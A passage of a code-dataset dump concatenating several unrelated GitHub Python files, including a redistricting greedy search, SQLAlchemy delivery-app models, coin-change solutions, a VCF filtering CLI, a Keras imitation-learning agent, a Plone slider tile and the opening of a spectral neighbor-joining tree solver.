min_votes, maj_votes = district_votes(district)\n\n # Ideal is that min_votes == maj_votes,\n # i.e. 
with the specified majority crossover\n # minority and majority voters are on equal footing\n diff = abs(min_votes - maj_votes) + 1 # To prevent 0 division\n return 1/diff\n\ndef greedy_search(seeds):\n districts = [(seed, [seed]) for seed in seeds]\n saturated = set()\n unclaimed = set(node_id for node_id in list(graph.nodes) if node_id not in seeds)\n pbar = tqdm(total=len(unclaimed), desc='Forming districts')\n while unclaimed:\n for district in districts:\n seed, tract_ids = district\n if seed in saturated: continue\n cands = get_candidates(district, unclaimed)\n if not cands: # Can happen if the district is surrounded on all sides\n saturated.add(seed)\n continue\n best_cand = max(cands, key=lambda cand: score_district((seed, tract_ids + [cand])))\n tract_ids.append(best_cand)\n unclaimed.remove(best_cand)\n pbar.update(1)\n return districts\n\nif __name__ == '__main__':\n print('Parameters:')\n print(' {} districts'.format(N_DISTRICTS))\n print(' Seeded at least {} tracts apart'.format(MIN_SEED_DISTANCE))\n print(' Tracts with EJ class >= {} considered \"minority\"'.format(EJ_MINORITY_CUTOFF))\n print(' Crossover {}% of majority votes to minority side'.format(CROSSOVER_PERCENT*100))\n\n seeds = select_seeds()\n for seed in seeds:\n tract = graph.nodes[seed]\n tracts_geo.loc[tract['GEOID'], 'Label'] = 'Seed'\n assert len(seeds) == N_DISTRICTS\n\n districts = greedy_search(seeds)\n print(' AbsDiff PctDiff PctMin')\n for i, district in enumerate(districts):\n min_votes, maj_votes = district_votes(district)\n diff = min_votes - maj_votes\n lead = '✅MIN' if diff >= 0 else '❌MAJ'\n min_pop, maj_pop = district_pop(district)\n p_min_pop = min_pop/(min_pop+maj_pop)\n print('District {:2}: {} {:10,} {:6.1f}% {:6.1f}% {}'.format(\n i, lead,\n abs(round(diff)),\n abs(round(diff))/(min_pop+maj_pop) * 100,\n p_min_pop * 100,\n 'X-OVER' if p_min_pop < 0.5 and diff >= 0 else '',\n ))\n\n for i, (_, tract_ids) in enumerate(districts):\n for tract_id in tract_ids[1:]: # First id is seed\n tract = graph.nodes[tract_id]\n tracts_geo.loc[tract['GEOID'], 'Label'] = 'District {}'.format(i)\n\n tracts_geo.plot(color=tracts_geo['Label'].map(color_mapping))\n plt.savefig('districts.png', dpi=300)\n plt.show()\n plt.close()","repo_name":"frnsys/power_districting","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72011166225","text":"from sqlalchemy import Column, Integer, Float, String, Boolean, ForeignKey, DateTime, JSON, UUID\nfrom sqlalchemy.orm import relationship\n\nfrom db_config import Base\n\n\nclass User(Base):\n __tablename__ = \"users\"\n\n id = Column('user_id', UUID, primary_key=True)\n username = Column(String)\n password = Column('user_password', String)\n role_id = Column(Integer)\n is_active = Column(Boolean)\n\n\nclass Product(Base):\n __tablename__ = 'products'\n\n id = Column('product_id', UUID, primary_key=True)\n product_name = Column(String)\n price = Column(Float)\n category_id = Column(UUID, ForeignKey('categories.category_id'))\n\n\nclass Category(Base):\n __tablename__ = 'categories'\n\n id = Column('category_id', UUID, primary_key=True)\n category_name = Column(String)\n\n\nclass Order(Base):\n __tablename__ = 'orders'\n\n id = Column('order_id', UUID, primary_key=True)\n customer_name = Column(String, nullable=False)\n delivery_info_id = Column(UUID, ForeignKey('delivery_info.delivery_info_id'), nullable=False)\n data = Column(JSON)\n 
order_status = Column(String)\n created_at = Column(DateTime(timezone=True))\n updated_at = Column(DateTime(timezone=True))\n\n delivery_info = relationship('DeliveryInfo', back_populates='order', lazy=\"joined\")\n\n\nclass OrderEvent(Base):\n __tablename__ = 'order_events'\n\n id = Column('order_event_id', UUID, primary_key=True)\n order_id = Column(UUID, ForeignKey('orders.order_id'), nullable=False)\n name = Column(String, nullable=False)\n data = Column(JSON)\n created_at = Column(DateTime(timezone=True))\n\n\nclass DeliveryInfo(Base):\n __tablename__ = 'delivery_info'\n\n id = Column('delivery_info_id', UUID, primary_key=True)\n address = Column(String)\n courier_id = Column(UUID, ForeignKey('users.user_id'))\n\n order = relationship('Order', back_populates='delivery_info')\n\n# Base.metadata.create_all(bind=engine)\n\n","repo_name":"tema001/experimental-delivery-api","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26089114049","text":"#recursive, memo, time: s*n, space: s*n\nclass Solution:\n def coinChange(self, coins: List[int], amount: int) -> int:\n self.table = {}\n result = self.helper(coins, 0, 0, amount)\n return result if result != sys.maxsize else -1\n \n def helper(self, coins, start, current, amount):\n if current == amount:\n return 0\n if current > amount:\n return -1\n if (start, current) in self.table:\n return self.table[(start, current)]\n result = sys.maxsize\n for idx in range(start, len(coins)):\n forward = self.helper(coins, idx, current+coins[idx], amount)\n if forward == -1:\n continue\n result = min(result, forward+1)\n self.table[(start, current)] = result\n return result\n#DP, time: s*n, space = s\nclass Solution:\n def coinChange(self, coins: List[int], amount: int) -> int:\n table = [sys.maxsize for i in range(amount+1)]\n table[0] = 0\n for coin in coins:\n for idx in range(coin, len(table)):\n table[idx] = min(table[idx], table[idx-coin]+1)\n return table[-1] if table[-1] != sys.maxsize else -1","repo_name":"finderkiller/LeetCode","sub_path":"322CoinChange.py","file_name":"322CoinChange.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30988244332","text":"import gzip\nimport json\nimport os\n\nimport click\n\nfrom cyvcf2 import VCF, Writer # type: ignore\n\nfrom .evaluate import site_concordancy\nfrom .filter import FilterClass, FilterParams, Filterer\nfrom .stats import Stats\n\n\n@click.command()\n@click.option(\"-c\", \"--call-vcf\", type=click.Path(exists=True),\n help=\"Path to VCF with calls to be evaluated\",\n required=True)\n@click.option(\"-p\", \"--positive-vcf\", type=click.Path(exists=True),\n help=\"Path to VCF with known calls\",\n required=True)\n@click.option(\"-cs\", \"--call-samples\", type=click.STRING, multiple=True,\n help=\"Sample(s) in call-vcf to consider. \"\n \"May be called multiple times\",\n required=True)\n@click.option(\"-ps\", \"--positive-samples\", type=click.STRING, multiple=True,\n help=\"Sample(s) in positive-vcf to consider. 
\"\n \"May be called multiple times\",\n required=True)\n@click.option(\"-s\", \"--stats\", type=click.Path(writable=True),\n help=\"Path to output stats json file\")\n@click.option(\"-dvcf\", \"--discordant-vcf\", type=click.Path(writable=True),\n help=\"Path to output the discordant vcf file\",\n required=False)\n@click.option(\"-mq\", \"--min-qual\", type=float,\n help=\"Minimum quality of variants to consider\", default=30)\n@click.option(\"-md\", \"--min-depth\", type=int,\n help=\"Minimum depth of variants to consider\", default=0)\ndef evaluate_cli(call_vcf, positive_vcf, call_samples, positive_samples,\n min_qual, min_depth, stats, discordant_vcf):\n c_vcf = VCF(call_vcf, gts012=True)\n p_vcf = VCF(positive_vcf, gts012=True)\n st, disc = site_concordancy(c_vcf, p_vcf, call_samples,\n positive_samples, min_qual, min_depth)\n # Write the stats json file\n if stats is None:\n print(json.dumps(st))\n else:\n with click.open_file(stats, 'w') as fout:\n fout.write(json.dumps(st))\n\n # If there were discordand records, and a discordant-vcf should be written\n if len(disc) > 0 and discordant_vcf:\n # make sure the parent folder exists\n parent_folder = os.path.dirname(discordant_vcf)\n os.makedirs(parent_folder, exist_ok=True)\n\n with click.open_file(discordant_vcf, 'w') as fout:\n # First, we write the vcf header\n with gzip.open(call_vcf, 'rt') as fin:\n for line in fin:\n if line.startswith('#'):\n fout.write(line)\n else:\n break\n # Then we write the vcf records that were discordant\n for record in disc:\n fout.write(str(record))\n\n\n@click.command()\n@click.option(\"-i\", \"--input\", type=click.Path(exists=True),\n help=\"Path to input VCF file\", required=True)\n@click.option(\"-o\", \"--output\", type=click.Path(writable=True),\n help=\"Path to output (filtered) VCF file\", required=True)\n@click.option(\"-t\", \"--trash\", type=click.Path(writable=True),\n help=\"Path to trash VCF file\", required=True)\n@click.option(\"-p\", \"--params-file\", type=click.Path(exists=True),\n help=\"Path to filter params json\", required=True)\n@click.option('--index-sample', type=click.STRING,\n help=\"Name of index sample\", required=True)\n@click.option(\"--immediate-return/--no-immediate-return\",\n default=True,\n help=\"Immediately write filters to file \"\n \"upon hitting one filter criterium. 
\"\n \"Default = True\")\ndef filter_cli(input, output, trash, params_file,\n index_sample, immediate_return):\n vcf = VCF(input, gts012=True)\n\n idx = vcf.samples.index(index_sample)\n for filter_item in list(FilterClass):\n vcf.add_filter_to_header(filter_item.value)\n\n out = Writer(output, vcf)\n tr = Writer(trash, vcf)\n\n filter_params = FilterParams(params_file)\n\n filter_it = Filterer(vcf, filter_params, idx, immediate_return)\n\n for record, fi in filter_it:\n if fi is None or len(fi) == 0:\n out.write_record(record)\n else:\n record.FILTER = [x.name for x in fi]\n tr.write_record(record)\n\n out.close()\n tr.close()\n\n\n@click.command()\n@click.option(\"-i\",\n \"--input\",\n type=click.Path(exists=True, dir_okay=False, readable=True),\n required=True,\n help=\"Input VCF file\")\ndef stats_cli(input):\n stats = Stats(input)\n print(stats.as_json)\n","repo_name":"LUMC/vtools","sub_path":"src/vtools/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11488200307","text":"#!/usr/bin/env python\nimport tensorflow as tf\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import *\nfrom keras.optimizers import RMSprop, Adam\nimport numpy as np\nimport random\nfrom collections import deque\nimport gym\nimport pickle\nimport os, sys, copy, argparse\nimport cv2\nfrom keras import backend as K\nfrom keras.layers import Lambda\nfrom keras.models import Model\n\nimport pdb\n\n\n\nclass RLAgents():\n\t\"\"\"\n\tDifferent reinforcement learning for different mini-tasks\n\tdynamically adding new agents\n\t\"\"\"\n\tdef __init__(self, state_dim, action_cnt, env_name='MZ'):\n\t\t\"\"\"\n\t\tstate_dim: dimension of states, tuple: (84, 84, 4)\n\t\taction_cnt: dimension of actions, scala\n\t\tenv_name: environment name, for keeping track\n\t\t\"\"\"\n\t\tself.state_dim = state_dim\n\t\tself.action_cnt = action_cnt\n\t\tself.env_name = env_name\n\t\tself.Agent_Dict = {}\n\n\tdef _get_agent(self, mini_task):\n\t\t\"\"\"\n\t\tmini_task: string for mini_task, each agent correspond to a mini_task\n\t\t\"\"\"\n\t\tif mini_task not in self.Agent_Dict:\n\t\t\tself.Agent_Dict[mini_task] = Imitation_Agent(self.state_dim, self.action_cnt, self.env_name, mini_task, \n\t\t\t\t\t\t\t\t\t\t\t\t lr=1e-3, train=True, save_every_step=1000, debug=False)\n\t\treturn self.Agent_Dict[mini_task]\n\n\tdef feedback(self, mini_task, feedbacks):\n\t\tagent = self._get_agent(mini_task)\n\t\tagent.step(feedbacks)\n\n\tdef execute(self, mini_task, states):\n\t\tagent = self._get_agent(mini_task)\n\n\t\taction = agent.predict(states)\n\t\t\n\t\treturn action\n\n\nclass Imitation_Agent():\n\t\"\"\"\n\tPolicy network imitation learning agent.\n\t\"\"\"\n\tdef __init__(self, state_dim, action_cnt, env_name, mini_task, lr=1e-3,\n\t\t\t\t train=True, save_every_step=1000, debug=False):\n\t\t\"\"\"\n\t\tInitialize a imitation learning agent.\n\n\t\t@param state_dim The dimension of states. (84, 84, 4)\n\t\t@param action_cnt The number of actions. scala\n\t\t@param env_name The name of the environment.\n\t\t@param mini_task The mini task for the network.\n\t\t@param train The switch to train the model. 
(default: True)\n\t\t\"\"\"\n\n\t\tself.state_dim = state_dim\n\t\tself.action_cnt = action_cnt\n\t\t# initialize the full actions array\n\t\tself.all_actions = [i for i in range(self.action_cnt)]\n\n\t\tself.env_name = env_name\n\t\tself.mini_task = mini_task\n\n\t\tself.debug = debug\n\t\tself.should_train = train\n\n\t\t# initialize the policy network and load weights if exist\n\t\tself.batch_size = 32\n\t\tself.learning_rate = lr\n\t\tself.network = PolicyNetwork(self.state_dim, self.action_cnt, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.env_name, self.mini_task,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.batch_size, self.learning_rate)\n\t\tself.step_cnt = 0\n\t\tself.save_every_step = save_every_step\n\n\t\t# load the saved model weights\n\t\tif os.path.isfile(self.network.default_weights_path):\n\t\t\tself.network.load_weights()\n\n\t\n\tdef predict(self, s):\n\t\t\"\"\"\n\t\tPredict the policy for the input state.\n\n\t\t@param s The current state.\n\t\t@return The action to take learned from expert.\n\t\t\"\"\"\n\t\taction_logits = self.network.predict(s)\n\t\taction = np.argmax(action_logits[0]) # TODO\n\t\treturn action\n\t\n\tdef step(self, feedbacks):\n\t\t\"\"\"\n\t\tStep forward to the next state.\n\n\t\tfeedbacks: a tuple. \n\t\t\t\t\texample: \n\t\t\t\t\t\t(state_images, actions, next_states, rewards, done)\n\t\t\t\t\t\tstate_images and next_states should be of shape (1, 84, 84, 4)\n\t\t\t\t\t\taction should be a scala\n\t\t\t\t\t\trewards should be a scala, the sum of rewards for the 4 frames\n\t\t\t\t\t\tdone should be a boolean\n\t\t\"\"\"\n\t\tstate_images, actions, _, _, _ = feedbacks\n\n\t\taction_idx = actions[0] # all actions the same\n\t\taction = np.zeros((1, self.action_cnt))\n\t\taction[0, action_idx] = 1\n\n\t\tself.network.train(state_images, action)\n\t\t\n\t\t# save network\n\t\tself.step_cnt += 1\n\t\tif self.should_train and self.step_cnt % self.save_every_step == 0 and self.step_cnt != 0:\n\t\t\t# save the latest model weights\n\t\t\tself.network.save_weights()\n\n\n\nclass PolicyNetwork():\n\tdef __init__(self, state_dim, action_cnt, env_name, suffix, batch_size=32, learning_rate=1e-4, debug=False):\n\t\t\"\"\"\n\t\tInitialize a policy network instance.\n\n\t\t@param state_dim The dimension of state space. (84, 84, 4)\n\t\t@param action_cnt The dimension of action space. scala\n\t\t@param env_name The name of the environment.\n\t\t@param suffix The test case suffix for the network.\n\t\t@param batch_size The size of the mini-batch in mini-batch gradient descent \n\t\t\t\t\t\t\t\t\t\t\toptimization for training the network. (default: 32)\n\t\t@param learning_rate The learning rate for training the network. 
\n\t\t\t\t\t\t\t\t\t\t\t\t (default: 1e-4)\n\t\t\"\"\"\n\n\t\tself.state_dim = state_dim\n\t\tself.action_cnt = action_cnt\n\n\t\tself.env_name = env_name\n\t\tself.suffix = suffix\n\n\t\tself.batch_size = batch_size\n\t\tself.learning_rate = learning_rate\n\n\t\tself.debug = debug\n\n\t\t# construct default file paths\n\t\tself.default_model_path = 'save_PN_' + self.env_name + '_' + self.suffix + '_model.h5'\n\t\tself.default_weights_path = 'save_PN_' + self.env_name + '_' + self.suffix + '_weights.h5'\n\n\t\t# build the keras model\n\t\tself.model = self._build_model()\n\n\tdef _build_model(self):\n\t\t\"\"\"\n\t\t(Internal)\n\t\tBuild the keras model of the policy network.\n\n\t\t@return A built keras model.\n\t\t\"\"\"\n\n\t\tmodel_input = Input(shape=self.state_dim)\n\n\t\tx = Conv2D(filters=32, kernel_size=8, strides=4, padding=\"valid\", activation=\"relu\")(model_input)\n\t\tx = Conv2D(filters=64, kernel_size=4, strides=2, padding=\"valid\", activation=\"relu\")(x)\n\t\tx = Conv2D(filters=64, kernel_size=3, strides=1, padding=\"valid\", activation=\"relu\")(x)\n\t\tx = Flatten()(x)\n\t\tx = Dense(activation='relu', units=512)(x)\n\t\taction_logits = Dense(activation='softmax', units=self.action_cnt)(x)\n\n\t\tmodel = Model(input=model_input, output=action_logits)\n\n\t\toptimizerRMSprop = RMSprop(lr=self.learning_rate)\n\t\toptimizerAdam = Adam(lr=self.learning_rate, beta_1=0.9, beta_2=0.999)\n\t\toptimizer = optimizerAdam # TODO\n\n\t\tmodel.compile(loss='categorical_crossentropy', optimizer=optimizer)\n\n\t\treturn model\n\n\tdef train(self, X, Y, epochs=1, verbose=0):\n\t\tself.model.fit(X, Y, epochs=epochs, verbose=verbose)\n\n\tdef predict(self, state):\n\n\t\tprediction = self.model.predict(state)\n\t\treturn prediction\n\n\tdef save_model(self, file_path=None):\n\t\t\"\"\"\n\t\tSave the keras model as a file.\n\n\t\t@param file_path The file path to save the keras model. (optional)\n\t\t@return The path to the saved keras model file.\n\t\t\"\"\"\n\t\t\n\t\tif file_path is None:\n\t\t\tfile_path = self.default_model_path\n\n\t\tif self.debug:\n\t\t\tprint(\"-----saving model to {}\".format(file_path))\n\t\t\t\n\t\tself.model.save(file_path)\n\n\t\treturn file_path\n\n\tdef save_weights(self, file_path=None):\n\t\t\"\"\"\n\t\tSave the keras model weights as a file.\n\n\t\t@param file_path The file path to save the keras model weights. (optional)\n\t\t@return The path to the saved keras weights file.\n\t\t\"\"\"\n\n\t\tif file_path is None:\n\t\t\tfile_path = self.default_weights_path\n\n\t\tif self.debug:\n\t\t\tprint(\"-----saving weights to {}\".format(file_path))\n\t\t\t\n\t\tself.model.save_weights(file_path)\n\n\t\treturn file_path\n\n\tdef load_model(self, file_path=None):\n\t\t\"\"\"\n\t\tLoad an existing keras model from a file.\n\n\t\t@param file_path The path to an existing keras model file. (optional)\n\t\t\"\"\"\n\n\t\tif file_path is not None:\n\t\t\tif self.debug:\n\t\t\t\tprint(\"-----loading model from {}\".format(file_path))\n\t\t\tself.model.load(file_path)\n\t\telse:\n\t\t\tif self.debug:\n\t\t\t\tprint(\"-----loading model from {}\".format(self.default_model_path))\n\t\t\tself.model.load(self.default_model_path)\n\n\tdef load_weights(self, file_path=None):\n\t\t\"\"\"\n\t\tLoad existing keras model weights from a file.\n\n\t\t@param file_path The path to an existing keras weights file. 
(optional)\n\t\t\"\"\"\n\n\t\tif file_path is not None:\n\t\t\tif self.debug:\n\t\t\t\tprint(\"-----loading weights from {}\".format(file_path))\n\t\t\tself.model.load_weights(file_path)\n\t\telse:\n\t\t\tif self.debug:\n\t\t\t\tprint(\"-----loading weights from {}\".format(self.default_weights_path))\n\t\t\tself.model.load_weights(self.default_weights_path)\n\n\ndef main():\n\tenv_name = 'SpaceInvaders-v0'\n\tenv = gym.make(env_name)\n\n\tstate_dim = (84, 84, 4)\n\taction_cnt = env.action_space.n\n\n\trlagents = RLAgents(state_dim, action_cnt, '_debug_')\n\n\tmini_task = \"say hi\"\n\tstates = np.random.rand(1, 84, 84, 4)\n\tfeedbacks = (states, [5, 4, 3, 2], states, 100, True)\n\n\trlagents.feedback(mini_task, feedbacks)\n\n\taction = rlagents.execute(mini_task, states)\n\tprint(\"------action: {}------\".format(action))\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"LogicRL/RLAgents","sub_path":"ImitationLearningAgents.py","file_name":"ImitationLearningAgents.py","file_ext":"py","file_size_in_byte":8183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13507887269","text":"import argparse\nimport deepchem\nimport json\nimport logging\nfrom pathlib import Path\n\nfrom src.model import ModelWrapper\n\n\nlogger = logging.getLogger('deepchem')\nlogger.disabled = True\n\n\ndef predict(\n keyword_inputs_json: str,\n smiles: str,\n model_checkpoint_path: Path,\n):\n model = ModelWrapper(model_checkpoint_path)\n keyword_inputs = json.loads(keyword_inputs_json)\n print(model(keyword_inputs, smiles))\n\n\ndef create_argument_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model-checkpoint-path\", type=Path, required=True)\n parser.add_argument(\"--smiles\", type=str, required=True)\n parser.add_argument(\"--keyword-inputs-json\", type=str, default='{}')\n return parser\n\n\nif __name__ == \"__main__\":\n parser = create_argument_parser()\n args = parser.parse_args()\n predict(**vars(args))","repo_name":"2roptsv/polymer-ai","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4187919672","text":"from plone import api\nfrom plone.app.z3cform.interfaces import IPloneFormLayer\nfrom plone.app.z3cform.widget import RelatedItemsWidget as BaseRelatedItemsWidget\nfrom plone.autoform import directives as form\nfrom plone.supermodel import model\nfrom plone.tiles import PersistentTile\nfrom zope import schema\nfrom zope.schema.vocabulary import SimpleVocabulary\n\nimport json\nimport z3c.form.interfaces\nimport z3c.form.widget\nimport zope.interface\nimport zope.schema.interfaces\n\n\nclass ImagesRelatedItemsWidget(BaseRelatedItemsWidget):\n\n def _base_args(self):\n args = super(ImagesRelatedItemsWidget, self)._base_args()\n args['pattern_options']['selectableTypes'] = ['Image']\n args['pattern_options']['baseCriteria'] = [{\n 'i': 'portal_type',\n 'o': 'plone.app.querystring.operation.selection.any',\n 'v': ['Image', 'Folder']\n }]\n return args\n\n\n@zope.component.adapter(zope.schema.interfaces.IField,\n IPloneFormLayer)\n@zope.interface.implementer(z3c.form.interfaces.IFieldWidget)\ndef ImagesRelatedItemsFieldWidget(field, request):\n widget = z3c.form.widget.FieldWidget(field, ImagesRelatedItemsWidget(request))\n widget.vocabulary = 'plone.app.vocabularies.Catalog'\n return widget\n\n\nclass SliderTile(PersistentTile):\n\n @property\n def 
pattern_options(self):\n opts = {\n 'animation': self.data.get('animation', 'fade'),\n 'controlNav': self.data.get('controlNav', True),\n 'directionNav': self.data.get('directionNav', True),\n 'slideshowSpeed': self.data.get('slideshowSpeed', 7000),\n 'animationSpeed': self.data.get('animationSpeed', 600)\n }\n return json.dumps(opts)\n\n def render(self):\n return self.index()\n\n @property\n def height(self):\n return self.data.get('height', 250)\n\n def get_image_data_from_brain(self, brain):\n base_url = brain.getURL()\n return {\n 'large': '%s/@@images/image/large' % base_url,\n 'medium': '%s/@@images/image/mini' % base_url,\n 'thumb': '%s/@@images/image/thumb' % base_url,\n 'original': base_url,\n 'title': brain.Title,\n 'description': brain.Description,\n 'link': '%s/view' % base_url\n }\n\n def get_image_data(self, im):\n base_url = im.absolute_url()\n related = self.get_related(im) or im\n return {\n 'large': '%s/@@images/image/large' % base_url,\n 'medium': '%s/@@images/image/mini' % base_url,\n 'thumb': '%s/@@images/image/thumb' % base_url,\n 'original': base_url,\n 'title': im.Title(),\n 'description': im.Description(),\n 'link': '%s/view' % related.absolute_url()\n }\n\n def get_images_in_folder(self, brain):\n if brain.portal_type == 'Folder':\n # get contents\n folder = brain.getObject()\n images = folder.getFolderContents()\n results = []\n for image in images:\n if image.portal_type == 'Image':\n results.append(self.get_image_data_from_brain(image))\n else:\n obj = image.getObject()\n if hasattr(obj, 'image') and hasattr(obj.image, 'contentType'):\n results.append(self.get_image_data(obj))\n return results\n else:\n return [self.get_image_data_from_brain(brain)]\n\n @property\n def images(self):\n results = []\n catalog = api.portal.get_tool('portal_catalog')\n brains = list(catalog(UID=self.data.get('images', [])))\n # we need to order this since catalog results are not ordered\n for uid in self.data['images']:\n found = False\n for brain in brains:\n if brain.UID == uid:\n found = brain\n break\n if not found:\n continue\n brains.remove(found)\n if found.is_folderish:\n results.extend(self.get_images_in_folder(brain))\n else:\n results.append(self.get_image_data_from_brain(found))\n return results\n\n\nclass ISliderTileSchema(model.Schema):\n\n form.widget(images=ImagesRelatedItemsFieldWidget)\n images = schema.List(\n title=u\"Images\",\n description=u\"Select images or folders of images to display in slider.\"\n u\" If the image has a related item selected, that \"\n u\"related item will be used for the link and description \"\n u\"for the slide display\",\n value_type=schema.Choice(\n vocabulary='plone.app.vocabularies.Catalog'\n )\n )\n\n animation = schema.Choice(\n title=u'Animation',\n vocabulary=SimpleVocabulary([\n SimpleVocabulary.createTerm('fade', 'fade', 'Fade'),\n SimpleVocabulary.createTerm('slide', 'slide', 'Slide'),\n ]),\n default='fade'\n )\n\n controlNav = schema.Bool(\n title=u'Control nav',\n default=True)\n\n directionNav = schema.Bool(\n title=u'Direction nav',\n default=True)\n\n slideshowSpeed = schema.Int(\n title=u'Cycle speed',\n description=u'In milliseconds',\n default=7000)\n\n animationSpeed = schema.Int(\n title=u'Animation speed',\n description=u'In milliseconds',\n default=600)\n","repo_name":"jazkarta/ploneconf2016.policy","sub_path":"ploneconf2016/policy/tiles/slider.py","file_name":"slider.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} 
+{"seq_id":"19628024715","text":"\nfrom utils import Input, printResult\nimport re\n\n# https://adventofcode.com/2020/day/18\n\ninput = Input(2020, 18).lines()\ninput = [s.replace(\" \", \"\") for s in input]\n\n# expr :: term (+|* term)*\n# term :: int | (expr)\n\ndef term1(input):\n val = input.pop(0)\n if val == '(':\n val = expr1(input)\n input.pop(0)\n return int(val)\n\ndef expr1(input):\n result = term1(input)\n while input and input[0] in ['*', '+']:\n op = int.__add__ if input[0] == '+' else int.__mul__\n input.pop(0)\n result = op(result, term1(input))\n return result\n\n# expr :: term (* term)*\n# term :: factor (+ factor)*\n# factor :: int | (expr)\n\ndef factor2(input):\n val = input.pop(0)\n if val == '(':\n val = expr2(input)\n input.pop(0)\n return int(val)\n\ndef term2(input):\n result = factor2(input)\n while input and input[0] == '+':\n input.pop(0)\n result += factor2(input)\n return result\n\ndef expr2(input):\n result = term2(input)\n while input and input[0] == '*':\n input.pop(0)\n result *= term2(input)\n return result\n\nprintResult(1, sum(map(expr1, map(list, input))))\nprintResult(2, sum(map(expr2, map(list, input))))\n","repo_name":"Zefick/Advent-of-Code","sub_path":"src/Python/2020/Day18.py","file_name":"Day18.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22437366420","text":"from common import TreeNode\n\n\nclass Solution:\n def postorderTraversal(self, root):\n if not root:\n return []\n res, visited = [], set()\n stack = [root]\n node = root\n while len(stack):\n if node.left and node.left not in visited:\n stack.append(node)\n node = node.left\n elif node.right and node.right not in visited:\n stack.append(node)\n node = node.right\n else:\n res.append(node.val)\n visited.add(node)\n node = stack.pop()\n return res\n\n\nif __name__ == '__main__':\n solution = Solution()\n print(TreeNode.list2Tree([1, None, 2, 3]))\n print(solution.postorderTraversal(TreeNode.list2Tree([1, None, 2, 3])))\n","repo_name":"MadSkittles/leetcode","sub_path":"145.py","file_name":"145.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18907629186","text":"\"\"\"\nThis file stores a subclass of DistanceSolver, SpectralNeighborJoining. This \nalgorithm is based on the one developed by Jaffe, et al. (2021) in their paper \ntitled \"Spectral neighbor joining for reconstruction of latent tree models\",\npublished in the SIAM Journal for Math and Data Science. \n \n\"\"\"\nfrom typing import Callable, Dict, List, Optional, Tuple\n\nimport itertools\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\nimport scipy\n\nfrom cassiopeia.data import CassiopeiaTree\nfrom cassiopeia.solver import (\n dissimilarity_functions,\n DistanceSolver,\n solver_utilities,\n)\n\n\n\nclass SpectralNeighborJoiningSolver(DistanceSolver.DistanceSolver):\n \"\"\"\n Spectral Neighbor-Joining class for Cassiopeia.\n\n Implements a variation on the Spectral Neighbor-Joining (abbrev SNJ)\n algorithm described by Jaffe et al. in their 2020 paper. This class\n implements the abstract class DistanceSolver, and inherits the 'solve'\n method from DistanceSolver with the 'find_cherry' method implemented using a\n spectral method as in Jaffe et al. (2020). In particular, we iteratively\n join subsets of leaves into a cherry based on the second singular value of\n the RA matrix of the pair. 
We start with all the subsets being singleton\n sets with each leaf node, then compute the second singular values of the RA\n matrices where A = S U T, S and T are distinct subsets of leaves, and RA is\n the matrix with rows indexed by elements of A and columns indexed by\n elements of A 's complement, and entries are R(i, j). These values are\n stored in a lambda matrix (rows and columns are subsets, entries are second\n singular values of RA) to avoid recalculating values. Finally we find the\n pair of (S, T) that gives the smallest second singular value for RA and\n replace S and T with S U T in the set of subsets, thereby joining S and T\n into a cherry. Repeat this process until there are only two remaining\n subsets. The runtime is O(n^4), but in reality will perform better than\n this.\n\n Args:\n similarity_function: A function by which to compute the similarity map,\n corresponding to the affinity R(i, j) in Jaffe et al.\n (2020). Note that this similarity score should be multiplicative,\n i.e. R(i, j) = R(i, k) * R(k, j) for k on the path from i to j on\n the lineage tree. By default we will use exp(-d(i,j)) where d is the\n metric given by weighted_hamming_distance from\n dissimilarity_functions without weights given.\n add_root: Whether or not to add an implicit root to the tree, i.e. a\n root with unmutated characters.\n prior_transformation: Function to use when transforming\n priors into weights\n \"\"\"\n\n def __init__(\n self,\n similarity_function: Optional[\n Callable[\n [np.ndarray, np.ndarray, int, Dict[int, Dict[int, float]]],\n float,\n ]\n ] = dissimilarity_functions.exponential_negative_hamming_distance,\n # type: ignore\n add_root: bool = False,\n prior_transformation: str = \"negative_log\",\n ):\n self._implementation = \"generic_spectral_nj\"\n \n super().__init__(\n dissimilarity_function=similarity_function,\n add_root=add_root,\n prior_transformation=prior_transformation,\n ) # type: ignore\n \n self._similarity_map = None\n self._lambda_indices = None\n\n\n def get_dissimilarity_map(\n self, cassiopeia_tree: CassiopeiaTree, layer: Optional[str] = None\n ) -> pd.DataFrame:\n \"\"\"Outputs the first lambda matrix.\n\n The lambda matrix is a k x k matrix indexed by the k subsets\n being considered at each step of the SNJ algorithm. The i, j th element\n is given by taking the second singular value of the RA matrix with A\n given by the union of the two sets indexed by i and j. This function\n generates the initial lambda matrix, where every subset is a singleton\n leaf node. This function has a runtime of O(n^3), with n the\n number of leaf nodes.\n\n Args:\n cassiopeia_tree: the CassiopeiaTree object passed into solve()\n layer: Layer storing the character matrix for solving. 
